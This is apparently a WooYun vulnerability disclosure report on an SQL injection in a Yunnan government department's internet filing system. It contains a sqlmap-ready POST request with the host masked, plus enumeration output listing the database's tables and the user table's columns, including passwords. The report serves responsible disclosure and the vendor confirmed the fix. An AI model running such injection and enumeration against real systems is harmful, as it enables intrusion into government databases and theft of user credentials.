当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138036

漏洞标题:云南省某敏感部门联网信息备案管理系统存在SQL注入漏洞

相关厂商:云南省某敏感部门

漏洞作者: qglfnt

提交时间:2015-08-31 15:22

修复时间:2015-10-16 10:20

公开时间:2015-10-16 10:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-31: 细节已通知厂商并且等待厂商处理中
2015-09-01: 厂商已经确认,细节仅向厂商公开
2015-09-11: 细节向核心白帽子及相关领域专家公开
2015-09-21: 细节向普通白帽子公开
2015-10-01: 细节向实习白帽子公开
2015-10-16: 细节向公众公开

简要描述:

RT

详细说明:

注入数据包 sqlmap -r 1.txt

POST http://**.**.**.**:81/UserRecordOperation/PulSearch.aspx HTTP/1.1
Host: **.**.**.**:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:81/UserRecordOperation/PulSearch.aspx
Cookie: ASP.NET_SessionId=3jk31ejwwvxk2c55oeb0xj55; maincardsel=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 586
__VIEWSTATE=UFvzF7SURJEcPhmKLbVYq12nf5Nwq15iwCSdfL%2BorhcFId4bgKiCAdmY5tzZ01x83NJ2N%2FkxOiF3xmi0MvccJt60VNZL%2FGHQdHkvEQxD0F6KGMVQt1N7sxZNXgJ79EIP8tfDRFEfSLC4bv%2B%2B369oxuno8DLdYWvPY2R7wtKrO7VWjIRkxselw1ue8XkXvDv5Zce8CG8SFiWuiRFmtjt%2FrIDOxvE%3D&__VIEWSTATEGENERATOR=EE853DC6&__EVENTVALIDATION=%2FY0vgI0xv5pZIhOrNkgfc%2BzmAJqouM7Eif7o6BSPRosB%2BjtqYtY%2FAV%2BQA4pIzY7ulQ6jAWaMyh0l6VWNPgXmLlah%2FVZdx6BJONxI4v78ix0Y1POY7eevvQ0n4X0%3D&Radio=2&ctl00%24ContentPlaceHolder1%24TextBox1=1111111111&ctl00%24ContentPlaceHolder1%24ImageButton1.x=62&ctl00%24ContentPlaceHolder1%24ImageButton1.y=1

漏洞证明:

存在问题参数以及当前数据库

20150830211241.png


所有库

20150830211427.jpg



Database: PP_RecordCase
[74 tables]
+---------------------------------+
| Base_ICP_Info                   |
| Base_IDC_Info                   |
| Base_ISP_Info                   |
| Base_Net_Info                   |
| Base_Place_Info                 |
| D99_CMD                         |
| D99_REG                         |
| D99_Tmp                         |
| RecordCase_DialupAccount        |
| RecordCase_ERoom_Info           |
| RecordCase_FixIP_Info           |
| RecordCase_Green_Info           |
| RecordCase_HardSafeProduct_Info |
| RecordCase_ICP_Info             |
| RecordCase_ICP_ServerType       |
| RecordCase_ICP_ServiceContent   |
| RecordCase_IDC_Info             |
| RecordCase_IPAddress            |
| RecordCase_ISP_Info             |
| RecordCase_IS_Info              |
| RecordCase_ManaAuditNotes       |
| RecordCase_NetCompany_Info      |
| RecordCase_Other_Info           |
| RecordCase_PlaceType            |
| RecordCase_RecDatu              |
| RecordCase_Result_Info          |
| RecordCase_SafePersonal_Info    |
| RecordCase_ServerAddress        |
| RecordCase_ServiceIP            |
| RecordCase_SoftSafeProduct_Info |
| RecordCase_SpecificMeasures     |
| RecordCase_UpFileType           |
| RecordCase_UpLoadExcel_Info     |
| RecordCase_UpdateModule         |
| RecordCase_UserNotes            |
| RecordCase_Wireless_Info        |
| SYS_AreaTown_Info               |
| SYS_AuditLog_Info               |
| SYS_DepartmentDecod_Info        |
| SYS_Logs_Info                   |
| SYS_Option_Info                 |
| SYS_PerCat_Info                 |
| SYS_RolePer_Info                |
| SYS_Roles_Info                  |
| SYS_SysTree                     |
| SYS_UserPer_Info                |
| SYS_User_Info                   |
| VIEW_AuditResult                |
| VIEW_EmphasesNetCom_EXPORT      |
| VIEW_ICPInfo_Select             |
| VIEW_ICP_EXPORT                 |
| VIEW_ICP_RESULT                 |
| VIEW_ICP_StandardEXPORT         |
| VIEW_ICP_Standard_IDCEXPORT     |
| VIEW_IDCInfo_Select             |
| VIEW_IDC_EXPORT                 |
| VIEW_IDC_RESULT                 |
| VIEW_IDC_StandardEXPORT         |
| VIEW_ISPInfo_Select             |
| VIEW_ISP_EXPORT                 |
| VIEW_ISP_RESULT                 |
| VIEW_ISP_StandardEXPORT         |
| VIEW_InternetNetCom_EXPORT      |
| VIEW_NETCOMP_RESULT             |
| VIEW_NetComInfo_Select          |
| VIEW_NetCom_EXPORT              |
| VIEW_RolePerCat                 |
| VIEW_TreePer                    |
| VIEW_UserRole                   |
| comd_list                       |
| dtproperties                    |
| pangolin_test_table             |
| syscommand                      |
| t_t                             |
+---------------------------------+


字段

Database: PP_RecordCase
Table: SYS_User_Info
[14 columns]
+---------------+---------+
| Column        | Type    |
+---------------+---------+
| AreaCodeID    | varchar |
| ChangeRecord  | int     |
| ControlRecord | varchar |
| DeleteRecord  | int     |
| Email         | varchar |
| ID            | int     |
| Password      | varchar |
| Phone         | varchar |
| Remark        | varchar |
| RoleID        | int     |
| Sex           | varchar |
| SuperiorID    | int     |
| TrueName      | varchar |
| UserName      | varchar |
+---------------+---------+


帐号信息,还有很多,只截了一部分

20150830211750.png


拒查水表啊

修复方案:

过滤参数或上WAF

版权声明:转载请注明来源 qglfnt@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-09-01 10:19

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无